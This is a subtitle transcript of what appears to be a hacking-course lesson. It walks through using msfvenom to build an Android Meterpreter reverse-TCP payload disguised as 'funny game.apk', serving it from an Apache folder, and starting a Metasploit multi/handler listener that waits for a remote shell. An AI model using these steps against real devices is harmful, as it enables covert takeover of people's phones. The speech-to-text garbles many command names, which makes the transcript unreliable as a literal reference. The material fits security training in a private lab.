1
00:00:00,990 --> 00:00:08,730
We've got our Android device up and running and we have our Calli Linux box ready log in and to give

2
00:00:08,730 --> 00:00:19,560
you an idea of the number of exploits that we can set up using MSF venom, just run MSF venom dash.

3
00:00:19,560 --> 00:00:25,610
Well, this should list the exploits that are included in the Métis framework venom.

4
00:00:26,310 --> 00:00:31,110
This is what allows us to create payloads and then send those to devices.

5
00:00:32,920 --> 00:00:39,700
You can see this is quite several screen voelz tons of Zaidee six.

6
00:00:41,620 --> 00:00:43,090
Tons of windows.

7
00:00:44,310 --> 00:00:53,820
Tons of windows, some thp, so we can run those on Web servers, some OSX, so if you want to test

8
00:00:53,820 --> 00:01:02,890
some Mac OS security, you've got it here to know J.S. Linux BSD.

9
00:01:03,390 --> 00:01:10,020
And then finally, as we get toward the top, we see some Android exploits that are included in here,

10
00:01:10,020 --> 00:01:19,320
including our old friend, interpretor, Android, interpretor slash reverse HTP, Android interpretor,

11
00:01:19,320 --> 00:01:20,880
reverse TCP.

12
00:01:20,880 --> 00:01:22,080
Could it be that easy?

13
00:01:22,470 --> 00:01:23,540
Well, let's find out.

14
00:01:23,550 --> 00:01:31,260
Let's dig in and use MSF venom to set up our own Android interpretor, reverse TCP exploit and see if

15
00:01:31,260 --> 00:01:33,300
we can get it on to our Android device.

16
00:01:33,820 --> 00:01:41,550
So I'm going to clear the screen first and very similar to the way we exploited Windows seven and Windows

17
00:01:41,550 --> 00:01:41,900
10.

18
00:01:42,210 --> 00:01:48,140
We're going to set up MSF Venom, Dasch, Payload Kaspi.

19
00:01:48,450 --> 00:01:49,710
We saw Android.

20
00:01:51,020 --> 00:01:52,730
Slash interpretor.

21
00:01:54,940 --> 00:02:03,760
Slash reverse, underscore Tsipi, we do need an L host, so if you don't remember your Kelly Linux

22
00:02:03,760 --> 00:02:05,920
IP address, you can start a new window.

23
00:02:07,020 --> 00:02:14,550
And Ron and I have config, but we're still running at 10 a.m. at three point five because we made sure

24
00:02:14,550 --> 00:02:16,020
we were on our private network.

25
00:02:16,530 --> 00:02:18,180
So we need to l host.

26
00:02:19,840 --> 00:02:20,590
Equals.

27
00:02:22,950 --> 00:02:29,760
Dot, oh, dot, three, five, and we don't need a file format because there's only one format for

28
00:02:29,760 --> 00:02:34,980
Android devices that's an app or an Android package file, but we do need to tell it where to put the

29
00:02:34,980 --> 00:02:35,550
output.

30
00:02:35,880 --> 00:02:40,880
And I will put that directly on the desktop again and then I'll copy it over.

31
00:02:40,890 --> 00:02:46,740
You can also just output this directly into your var html share folder if you still have that from earlier.

32
00:02:47,130 --> 00:02:50,010
But I will say Dasch output.

33
00:02:51,470 --> 00:02:58,620
Slash, root, slash, desktop slash, let's call this funny game.

34
00:02:58,880 --> 00:03:06,110
RPK funny game APIC just like our Windows interpreter.

35
00:03:06,380 --> 00:03:10,850
This is going to set up an Android version of the interpreter, a command line shell that's going to

36
00:03:10,850 --> 00:03:15,470
give us access to that Android device, just like the Windows interpreter example's did.

37
00:03:15,920 --> 00:03:21,470
And we have had to specify our localhost that tend not Odah three point five so that when that reverse

38
00:03:21,470 --> 00:03:29,750
TCP comes calling, our localhost will be where it calls back to and then we've output that to the desktop

39
00:03:29,750 --> 00:03:35,270
as funny game today, B.K., it should take just a moment to run and now you'll notice I have a funny

40
00:03:35,270 --> 00:03:37,970
game that apk file right here on my desktop.

41
00:03:38,390 --> 00:03:46,940
Well, if you still have your var w-w html share folder from the Windows seven and Windows 10 hacks,

42
00:03:47,330 --> 00:03:56,320
we should just be able to sepi that desktop, that desktop slash.

43
00:03:56,330 --> 00:03:56,870
Funny.

44
00:03:58,100 --> 00:04:09,410
Game that apk two hour slash bar, slash W-W tab, slash h t tab, S.H. tab and now if we lose that

45
00:04:09,530 --> 00:04:13,730
bar w w w html share.

46
00:04:14,970 --> 00:04:21,720
We should see the game, daddy, see the fun video to see that we created for our Windows seven and

47
00:04:21,720 --> 00:04:28,260
Windows 10 and now we have funny game, that APIC, that Android package file.

48
00:04:28,620 --> 00:04:34,230
It's going to allow us to run this mature on a vulnerable Android device.

49
00:04:34,620 --> 00:04:38,340
So let's make sure that the Apache server is running service.

50
00:04:40,520 --> 00:04:48,950
Pache to start, then let's go ahead and run the MSF council so we can listen using that multi handler

51
00:04:49,520 --> 00:04:51,110
MSF console.

52
00:04:54,110 --> 00:05:00,500
You can also just run Métis plate from any of your links under applications or here on the left hand

53
00:05:00,500 --> 00:05:00,890
bar.

54
00:05:02,570 --> 00:05:09,200
We'll say use exploit multi endler, set the payload.

55
00:05:10,670 --> 00:05:13,730
As Android slash interpreter.

56
00:05:15,100 --> 00:05:19,840
Shlash reverse tab t tab reverse Tsipi.

57
00:05:21,950 --> 00:05:25,190
Just like before, we want to set our losed.

58
00:05:27,530 --> 00:05:34,430
To 10 odon three, not five hour Calli Linux, IP address, whatever yours is, goes right there.

59
00:05:36,960 --> 00:05:39,870
And we can show options just like we've done before.

60
00:05:42,480 --> 00:05:45,540
Those are the only two required things they'll host in the airport.

61
00:05:48,650 --> 00:05:51,650
So we're ready to run the exploit exploit.

62
00:05:53,180 --> 00:05:55,050
That's Jay Z.

63
00:05:56,630 --> 00:06:05,060
And so now we have an interpreter listening for any Android device to call in using that 10 DataDot

64
00:06:05,120 --> 00:06:11,470
three, not five apk file, it's going to bring them back to this machine.

65
00:06:12,470 --> 00:06:16,940
So we'll switch back over to Android and we'll actually will change your browser settings.

66
00:06:16,940 --> 00:06:19,130
So that will be able to download this file effectively.

67
00:06:19,640 --> 00:06:22,150
And then we'll give this exploit a try.

68
00:06:22,340 --> 00:06:23,750
We'll see in the next lesson.